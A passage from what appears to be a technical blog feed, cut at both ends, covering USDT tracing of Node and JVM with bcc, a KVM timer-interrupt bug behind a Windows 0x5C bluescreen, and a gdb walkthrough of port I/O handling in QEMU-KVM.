<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
PID TID COMM FUNC -
25022 25022 node http__server__request GET /
25022 25022 node http__server__request GET /index.html
25022 25022 node http__server__request GET /login?user=dave&pwd=123
</code></pre></div></div>
<h3> JVM </h3>
<p>下载<a href="https://github.com/mpujari/systemtap-tapset-openjdk9">tapset</a></p>
<p>查看USDT probe:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9# ./create-tapset.sh /usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*class_loaded' *.stp
hotspot-1.9.0.stp:probe hotspot.class_loaded =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "class_loaded";
hotspot-1.9.0.stp- class = user_string_n($arg1, $arg2);
hotspot-1.9.0.stp- classloader_id = $arg3;
hotspot-1.9.0.stp- is_shared = $arg4;
hotspot-1.9.0.stp- probestr = sprintf("%s(class='%s',classloader_id=0x%x,is_shared=%d)",
hotspot-1.9.0.stp- name, class, classloader_id, is_shared);
hotspot-1.9.0.stp-}
</code></pre></div></div>
<p>启动slowy/App</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java slowy/App
</code></pre></div></div>
<p>查看进程probe点:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# /usr/lib/jvm/java-9-openjdk-amd64/bin/jps
33757 sun.tools.jps.Jps
33727 App
root@ubuntu1604:~/bcc/tools# ./tplist.py -p 33727 '*class*loaded'
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__loaded
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__unloaded
root@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
<p>开始跟踪:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
</code></pre></div></div>
<p>关闭slowy/App, 可以看到trace到了加载的类</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
PID TID COMM FUNC -
33727 33728 java class__loaded java/lang/Shutdown
33727 33728 java class__loaded java/lang/Shutdown$Lock
</code></pre></div></div>
<p>接下来trace一下参数:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_entry' *.stp
hotspot-1.9.0.stp:probe hotspot.method_entry =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_entry";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_return' *.stp
hotspot-1.9.0.stp:probe hotspot.method_return =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_return";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
</code></pre></div></div>
<p>可以看到参数2和4分别表示class和method。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -p 33840 -C 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4' -T 5
[19:09:19]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:20]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:21]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:22]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1 arg4 = getBufIfOpen
4516 arg4 = isPrime
4516 arg4 = isSimplePrime
891794 arg4 = isDivisible
[19:09:23]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
2309 arg4 = isPrime
2309 arg4 = isSimplePrime
1036648 arg4 = isDivisible
[19:09:24]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1768 arg4 = isPrime
1768 arg4 = isSimplePrime
1039152 arg4 = isDivisible
[19:09:25]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1467 arg4 = isPrime
1467 arg4 = isSimplePrime
1038429 arg4 = isDivisible
[19:09:26]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1325 arg4 = isPrime
1325 arg4 = isSimplePrime
1038159 arg4 = isDivisible
</code></pre></div></div>
<p>可以看到大部分时间都在调用isDivisible。</p>
<p>启动slowy/App:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java -XX:-Inline -XX:+ExtendedDTraceProbes slowy/App
</code></pre></div></div>
<p>跟踪函数的entry和return:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33918 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry "%s.%s", arg2, arg4' 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__return "%s.%s", arg2, arg4'
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
</code></pre></div></div>
<p>可以看到有大量的函数entry和return(未来得及显示)。</p>
Analysis of a 0x5c BSOD caused by timer interrupt in KVM when VMs reboot2017-11-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/11/27/clock-init-failed-bsod
<ul>
<li>
<p><a href="#0">Issue Description</a></p>
</li>
<li>
<p><a href="#1">Analysis in Windows kernel side</a></p>
</li>
<li>
<p><a href="#2">Analysis in KVM side</a></p>
</li>
<li>
<p><a href="#3">Reference</a></p>
</li>
</ul>
<h2 id="0">Issue Description</h2>
<p>Recently I was assigned a BOSD caused by rebooting the Windows guest in KVM. I have made a deep analysis of it.
Though I’m not 100% satisfied with the final conclude, it still makes sense and is a good explaination. I have got a lot of help from Wei Wang of intel, Vadim Rozenfeld of redhat, and Paolo Bonzini of redhat, many thanks to them.</p>
<p>This issue is quite directly. Though not every time it causes BSOD, we reboot the Windows guest several times it will almost got BSOD with 0x5c(0x10b,3,0,0). Here is the summary infomation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> FOLLOWUP_IP:
nt!InitBootProcessor+12a
fffff800`01c01d0a 413ac6 cmp al,r14b
SYMBOL_STACK_INDEX: 6
SYMBOL_NAME: nt!InitBootProcessor+12a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 59b946d1
IMAGE_VERSION: 6.1.7601.23915
FAILURE_BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:x64_0x5c_hal_clock_interrupt_not_received_nt!initbootprocessor+12a
FAILURE_ID_HASH: {829a944d-7639-05f1-a55f-2677354a890e}
kd> kb
# RetAddr : Args to Child : Call Site
00 fffff800`017b9662 : 00000000`0000010b fffff800`01854cc0 00000000`00000065 fffff800`01705514 : nt!DbgBreakPointWithStatus
01 fffff800`017ba44e : 00000000`00000003 00000000`00000000 fffff800`01705d70 00000000`0000005c : nt!KiBugCheckDebugBreak+0x12
02 fffff800`016c8f04 : 00000000`00000001 fffff800`0161e0b3 00000000`00002a43 00000000`00000000 : nt!KeBugCheck2+0x71e
03 fffff800`0161e2b4 : 00000000`0000005c 00000000`0000010b 00000000`00000003 00000000`00000000 : nt!KeBugCheckEx+0x104
04 fffff800`016442a3 : 00000000`00000001 fffff800`0080e4b0 fffff800`0080e4b0 00000000`00000001 : hal!HalpInitializeClock+0x1c9
05 fffff800`01c01d0a : fffff800`0080e4b0 fffff800`0080e4b0 fffff800`013d8780 fffff800`016c0c86 : hal!HalpInitSystem+0x29b
06 fffff800`0191cfa3 : fffff800`00000000 fffff800`01846e80 fffff800`013d8780 00000000`00000001 : nt!InitBootProcessor+0x12a
07 fffff800`0190a8a6 : 00000000`00000230 fffff800`02b28588 fffff800`013d8b30 00000001`00000000 : nt!KiInitializeKernel+0x833
08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemStartup+0x196
</code></pre></div></div>
<p>It is obvious function ‘HalpInitializeClock’ has failed and causes a bugcheck. Disassemb this and it easy to find out this bugcheck is caused when it calls function ‘HalpWaitForPhase0ClockTick’ and the later function return failed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kd> uf HalpInitializeClock
hal!HalpInitializeClock:
fffff800`01bff0ec 4889742408 mov qword ptr [rsp+8],rsi
fffff800`01bff0f1 9c pushfq
fffff800`01bff0f2 4883ec50 sub rsp,50h
fffff800`01bff0f6 488b0503600100 mov rax,qword ptr [hal!_security_cookie (fffff800`01c15100)]
fffff800`01bff0fd 4833c4 xor rax,rsp
fffff800`01bff100 4889442440 mov qword ptr [rsp+40h],rax
fffff800`01bff105 8b0dc1a20100 mov ecx,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
...
hal!HalpInitializeClock+0x19c:
fffff800`01bff287 b9b80b0000 mov ecx,0BB8h
fffff800`01bff28c e8e3fdffff call hal!HalpWaitForPhase0ClockTick (fffff800`01bff074)
fffff800`01bff291 84c0 test al,al
fffff800`01bff293 7520 jne hal!HalpInitializeClock+0x1ca (fffff800`01bff2b5)
hal!HalpInitializeClock+0x1aa:
fffff800`01bff295 4c630530a10100 movsxd r8,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
fffff800`01bff29c 488364242000 and qword ptr [rsp+20h],0
fffff800`01bff2a2 4533c9 xor r9d,r9d
fffff800`01bff2a5 418d495c lea ecx,[r9+5Ch]
fffff800`01bff2a9 ba0b010000 mov edx,10Bh
fffff800`01bff2ae ff153c000100 call qword ptr [hal!_imp_KeBugCheckEx (fffff800`01c0f2f0)]
fffff800`01bff2b4 cc int 3
...
fffff800`01bff2da c3 ret
</code></pre></div></div>
<p>So just copy+paste “HalpWaitForPhase0ClockTick” in the Google, you will find this bugzilla:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://bugzilla.redhat.com/show_bug.cgi?id=1387054
</code></pre></div></div>
<p>Seems the same, just differently in the bugcheck’s second parameter which is ‘1’ in the bugzilla but is ‘3’ in our BSOD. So I find the patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1
</code></pre></div></div>
<p>And applied this patch, reboot guest several times, no BSOD. This process just take me ten minutes and seems life is OK again. Over? Ofcourse not, I’m curious about this issue and want to know more under the surface of this BSOD.</p>
<h2 id="1">Analysis in Windows kernel side</h2>
<p>Let’s look at more in detail about the backtrack in windbg.</p>
<p>If you have some backgroud of Windows startup, you should know that this backtrack show the BSOD happend in the Phase0 initialization. In this phase initialization, only one processor get initialized which called boot processor. In the backtrack, we can see Windows is initializing the Clock. From the summary of BSOD, we see “x64_0x5c_hal_clock_interrupt_not_received_nt” this indicate the issue, the windows doesn’t received interrupts.</p>
<p>Let’s see the disassemble of function “HalpWaitForPhase0ClockTick”. This is the main logic of this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char __fastcall HalpWaitForPhase0ClockTick(unsigned int a1)
{
unsigned __int64 v1; // rbx
v1 = ((unsigned __int64)((HalpProc0TSCHz * (unsigned __int64)a1 * (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)
+ ((unsigned __int64)(HalpProc0TSCHz * a1
- (HalpProc0TSCHz
* (unsigned __int64)a1
* (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)) >> 1)) >> 9)
+ __rdtsc();
HalpProcessorFence();
if ( HalpPhase0ClockInterruptCount )
return 1;
while ( __rdtsc() <= v1 )
{
if ( HalpPhase0ClockInterruptCount )
return 1;
}
return 0;
}
char HalpHpetClockInterruptStub()
{
++HalpPhase0ClockInterruptCount;
return 1;
}
</code></pre></div></div>
<p>Here ‘HalpPhase0ClockInterruptCount’ counts the clock interrupt count, it will increment every timer interrupt. It is easy to understand that this function is waiting interrupt within v1 times (from the redhat bugzilla, it’s 3s). From Vadim Rozenfeld, I know this is a common technique in Windows kernel that the HAL initialization process waits for some period of time which considered to be enough to complete this initialization action, in this case it’s the clock. So the BSOD in Windows kernel is clear, when the guest try to initialize the clock, it waits some time(3s) to ensure timer interrupt has been triggered(through HalpPhase0ClockInterruptCount). But it doesn’t wait this interrupt and think the clock hasn’t worked in a good state so triggers this BSOD.</p>
<h2 id="2">Analysis in KVM side</h2>
<p>As we have know the story in Windows side let’s look at the KVM side.
Though I’m familiar with CPU/Memory/Device virtualization in qemu/kvm stack, to be honest, I’m not familiar the interrupt virtualizaton. Let’s see the patch <a href="https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1">KVM: x86: reset RVI upon system reset</a>, the commit says</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "A bug was reported as follows: when running Windows 7 32-bit guests on qemu-kvm,
sometimes the guests run into blue screen during reboot. The problem was that a
guest's RVI was not cleared when it rebooted. This patch has fixed the problem."
</code></pre></div></div>
<p>This patch clear the RVI when reboot. First let’s look at the reboot path.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm_vcpu_ioctl(CPU(s->cpu), KVM_SET_LAPIC, &kapic);
-->kvm_vcpu_ioctl_set_lapic
-->kvm_apic_post_state_restore
-->vmx_hwapic_irr_update
-->vmx_set_rvi
</code></pre></div></div>
<p>The later two function was added by the patch.
Here is a brief introduction of some registers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>IRR: Interrupt Request Register, if the nth bit is set, the LAPIC has received the nth interrupt but not deliver it to CPU
RVI: Requesting virtual interrupt, This is the low byte of the guest interrupt status. The processor
treats this value as the vector of the highest priority virtual interrupt that is requesting service.
SVI: Servicing virtual interrupt, This is the high byte of the guest interrupt status. The processor
treats this value as the vector of the highest priority virtual interrupt that is in service.
EOI: End of Interrupt, the software write this register in the end of interrupt handler to notify the virtual apic deliver next interrupt.
ISR: In-Service Register, if the nth bit is set, the CPU has processed the nth interrupt, but not complete
</code></pre></div></div>
<p>RVI and SVI is in the virtual apic only, they characterize part of the guest’s virtual-APIC state and
does not correspond to any processor or APIC registers.
The general process is this, interrupt was set in IRR, then RVI, when the guest process interrupt, and set the ISR, when it finish the interrupt dispatch it writes EOI register to notifiy virtual apic to deliver another interrupt.</p>
<p>In this BSOD case, the RVI register is not clear and it has higher priority than the timer interrupt, as it is in the eary of Windows initialization, there maybe no corresponding interrupt procedure for the obsolete RVI interrupt so no handler can handle it. As the RVI interrupt has higher priority than timer interrupt, and the ISR in virtual apic can’t be get clear, the virtual apic will not deliver the timer interrupt and make the Widnows BSOD.</p>
<h2 id="3">Reference</h2>
<ol>
<li>
<p>SDM 24.4.2</p>
</li>
<li>
<p>Mctrain’s Blog: <a href="http://ytliu.info/blog/2016/12/24/zhong-duan-chu-li-de-na-xie-shi-er/">中断处理的那些事儿</a></p>
</li>
</ol>
QEMU-KVM中的PIO处理2017-07-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/07/10/kvm-pio
<ul>
<li>
<p><a href="#0">零. 准备工作</a></p>
</li>
<li>
<p><a href="#1">一. IO端口在KVM中的注册</a></p>
</li>
<li>
<p><a href="#2">二. PIO中out的处理流程</a></p>
</li>
<li>
<p><a href="#3">三. PIO中in的处理流程</a></p>
</li>
<li>
<p><a href="#4">四. 参考</a></p>
</li>
</ul>
<p>我们都知道在kvm/qemu的虚拟机中向端口读写输入会陷入kvm中(绝大部分端口)。但是其具体过程
是怎么样的,虚拟机, kvm,
qemu这三者的关系在这个过程中又是如何相互联系来完成这一模拟
过程的。本文就是即是对这一问题的探索,通过对kvm进行调试来了解其中的奥秘。</p>
<h2 id="0">零. 准备工作</h2>
<p>工欲善其事,必先利其器。为了了解kvm如何对PIO进行截获处理,首先需要调试kvm,这需要
配置双机调试环境,网上很多例子,需要注意的是,4.x内核清除kernel
text的可写保护有点问题。所以本文还是用的3.x内核,具体为3.10.105。所以我们的环境是target为3.10.105的内核,debugger随意。</p>
<p>如果我们直接用kvm/qemu调试,由于一个完整的环境会有非常多的vm
exit,会干扰我们的分析。 这里我们只需要建立一个使用kvm
api建立起一个最简易虚拟机的例子,在虚拟机中执行in/out
指令即可。网上也有很多这种例子。比如<a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a>,
<a href="http://www.linuxjournal.com/magazine/linux-kvm-learning-tool">Linux KVM as a Learning
Tool</a>.</p>
<p>这里我们使用第一个例子,首先从</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://github.com/soulxu/kvmsample
</code></pre></div></div>
<p>把代码clone下来,直接make,如果加载了kvm应该就可以看到输出了,kvm的api用法这里不表,仔细看看
前两篇文章之一就可以了,qemu虽然复杂,本质上也是这样运行的。这个例子中的guest是向端口输出数据。</p>
<h2 id="1">一. IO端口在KVM中的注册</h2>
<p>首先我们需要明确的一点是,IO port
这个东西是CPU用来与外设进行数据交互的,也不是所有CPU都有。 在虚拟机看来是没有IO
port这个概念的,所以是一定要在vm exit中捕获的。</p>
<p>对于是否截获IO指令,是由vmcs中的VM-Execution controls中的两个域决定的。
参考intel SDM 24.6.2:</p>
<p><img src="/assets/img/pio/1.png" alt="" /></p>
<p>我们可以看到如果设置了Use I/O bitmpas这一位,Unconditional I/O
exiting就无效了,如果在IO bitmap 中某一位被设置为1,则访问该端口就会发生vm
exit,否则客户机可以直接访问。 IO bitmap的地址存在vmcs中的I/O-Bitmap
Addresses域中,事实上,有两个IO bitmap,我们叫做A和B。 再来看看SDM</p>
<p><img src="/assets/img/pio/2.png" alt="" /></p>
<p>每一个bitmap包含4kb,也就是一个页,bitmap
A包含了端口0000H到7FFFFH(4*1024*8),第二个端口包含了8000H到 FFFFH。</p>
<p>好了,我们已经从理论上对IO port有了了解了,下面看看kvm中的代码。</p>
<p>首先我们看到arch/x86/kvm/vmx.c中,定义了两个全局变量表示bitmap A和B的地址。
在vmx_init函数中这两个指针都被分配了一个页大小的空间,之后所有位都置1,然后在bitmap
A中对第 80位进行了清零,也就是客户机访问这个0x80端口不会发生vm exit。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static unsigned long *vmx_io_bitmap_a;
static unsigned long *vmx_io_bitmap_b;
static int __init vmx_init(void)
{
vmx_io_bitmap_a = (unsigned long *)__get_free_page(GFP_KERNEL);
vmx_io_bitmap_b = (unsigned long *)__get_free_page(GFP_KERNEL);
/*
* Allow direct access to the PC debug port (it is often used for I/O
* delays, but the vmexits simply slow things down).
*/
memset(vmx_io_bitmap_a, 0xff, PAGE_SIZE);
clear_bit(0x80, vmx_io_bitmap_a);
memset(vmx_io_bitmap_b, 0xff, PAGE_SIZE);
...
}
</code></pre></div></div>
<p>在同一个文件中,我们看到在对vcpu进行初始化的时候会把这个bitmap
A和B的地址写入到vmcs中去,这样 就建立了对IO port的访问的截获。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int vmx_vcpu_setup(struct vcpu_vmx *vmx)
{
/* I/O */
vmcs_write64(IO_BITMAP_A, __pa(vmx_io_bitmap_a));
vmcs_write64(IO_BITMAP_B, __pa(vmx_io_bitmap_b));
return 0;
}
</code></pre></div></div>
<h2 id="2">二. PIO中out的处理流程</h2>
<p>本节我们来探讨一下kvm中out指令的处理流程。首先,将上一节中的test.S代码改一下,只out一次。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
out %ax, $0x10
inc %ax
hlt
</code></pre></div></div>
<p>kvm中guest发送vm exit之后会根据发送exit的原因调用各种handler。这也在vmx.c中</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int (*const kvm_vmx_exit_handlers[])(struct kvm_vcpu *vcpu) = {
[EXIT_REASON_EXCEPTION_NMI] = handle_exception,
[EXIT_REASON_EXTERNAL_INTERRUPT] = handle_external_interrupt,
[EXIT_REASON_TRIPLE_FAULT] = handle_triple_fault,
[EXIT_REASON_NMI_WINDOW] = handle_nmi_window,
[EXIT_REASON_IO_INSTRUCTION] = handle_io,
...
}
</code></pre></div></div>
<p>对应这里,处理IO的回调是handle_io。我们在target中执行:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu:/home/test# echo g >/proc/sysrq-trigger
</code></pre></div></div>
<p>这样调试机中的gdb会断下来,给handle_io下个断点:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b handle_io
Breakpoint 1 at 0xffffffff81037dca: file arch/x86/kvm/vmx.c, line 4816.
(gdb) c
</code></pre></div></div>
<p>接着,我们用gdb启动target中的kvmsample,并且在main.c的84行下个断点。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/kvmsample$ gdb ./kvmsample
...
Reading symbols from ./kvmsample...done.
(gdb) b ma
main main.c malloc malloc@plt
(gdb) b main.c:84
Breakpoint 1 at 0x400cac: file main.c, line 84.
</code></pre></div></div>
<p>第84行恰好是从ioctl KVM_RUN中返回回来的时候。</p>
<p><img src="/assets/img/pio/3.png" alt="" /></p>
<p>好了,开始r,会发现debugger已经断下来了:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb)
</code></pre></div></div>
<p>从handle_io的代码我们可以看出,首先会从vmcs中读取exit的一些信息,包括访问这个端口是in还是out,
大小,以及端口号port等。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_io(struct kvm_vcpu *vcpu)
{
unsigned long exit_qualification;
int size, in, string;
unsigned port;
exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
string = (exit_qualification & 16) != 0;
in = (exit_qualification & 8) != 0;
++vcpu->stat.io_exits;
if (string || in)
return emulate_instruction(vcpu, 0) == EMULATE_DONE;
port = exit_qualification >> 16;
size = (exit_qualification & 7) + 1;
skip_emulated_instruction(vcpu);
return kvm_fast_pio_out(vcpu, size, port);
}
</code></pre></div></div>
<p>之后通过skip_emulated_instruction增加guest的rip之后调用kvm_fast_pio_out,在该函数中,
我们可以看到首先读取guest的rax,这个值放的是向端口写入的数据,这里是,0xa</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_fast_pio_out(struct kvm_vcpu *vcpu, int size, unsigned short port)
{
unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
size, port, &val, 1);
/* do not return to emulator after return from userspace */
vcpu->arch.pio.count = 0;
return ret;
}
</code></pre></div></div>
<p>我们可以对比gdb中看看数据:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb) n
4825 ++vcpu->stat.io_exits;
(gdb) n
4827 if (string || in)
(gdb) n
4832 skip_emulated_instruction(vcpu);
(gdb) n
[New Thread 3654]
4834 return kvm_fast_pio_out(vcpu, size, port);
(gdb) s
kvm_fast_pio_out (vcpu=0xffff8800ac528000, size=16, port=16)
at arch/x86/kvm/x86.c:5086
5086 {
(gdb) n
[New Thread 3656]
5087 unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
(gdb) n
[New Thread 3657]
5088 int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
(gdb) p /x val
$1 = 0xa
(gdb)
</code></pre></div></div>
<p>再往下,我们看到在emulator_pio_out_emulated,把值拷贝到了vcpu->arch.pio_data中,接着调用
emulator_pio_in_out。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_out_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port,
const void *val, unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
memcpy(vcpu->arch.pio_data, val, size * count);
return emulator_pio_in_out(vcpu, size, port, (void *)val, count, false);
}
static int emulator_pio_in_out(struct kvm_vcpu *vcpu, int size,
unsigned short port, void *val,
unsigned int count, bool in)
{
trace_kvm_pio(!in, port, size, count);
vcpu->arch.pio.port = port;
vcpu->arch.pio.in = in;
vcpu->arch.pio.count = count;
vcpu->arch.pio.size = size;
if (!kernel_pio(vcpu, vcpu->arch.pio_data)) {
vcpu->arch.pio.count = 0;
return 1;
}
vcpu->run->exit_reason = KVM_EXIT_IO;
vcpu->run->io.direction = in ? KVM_EXIT_IO_IN : KVM_EXIT_IO_OUT;
vcpu->run->io.size = size;
vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
vcpu->run->io.count = count;
vcpu->run->io.port = port;
return 0;
}
</code></pre></div></div>
<p>在后一个函数中,我们可以看到vcpu->run->io.data_offset设置为4096了,我们可以看到之前已经把我们
向端口写的值通过memcpy拷贝到了vpuc->arch.pio_data中去了,通过调试我们可以看出其中的端倪。
vcpu->arch.pio_data就在kvm_run后面一个页的位置。这也可以从kvm_vcpu_init中看出来。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4405 vcpu->run->io.size = size;
(gdb) n
[New Thread 3667]
4406 vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
(gdb) n
4407 vcpu->run->io.count = count;
(gdb) n
4408 vcpu->run->io.port = port;
(gdb) p count
$7 = 1
(gdb) n
4410 return 0;
(gdb) x /2b 0xffff88002a2a2000+0x1000
0xffff88002a2a3000: 0x0a 0x00
(gdb) p vcpu->run
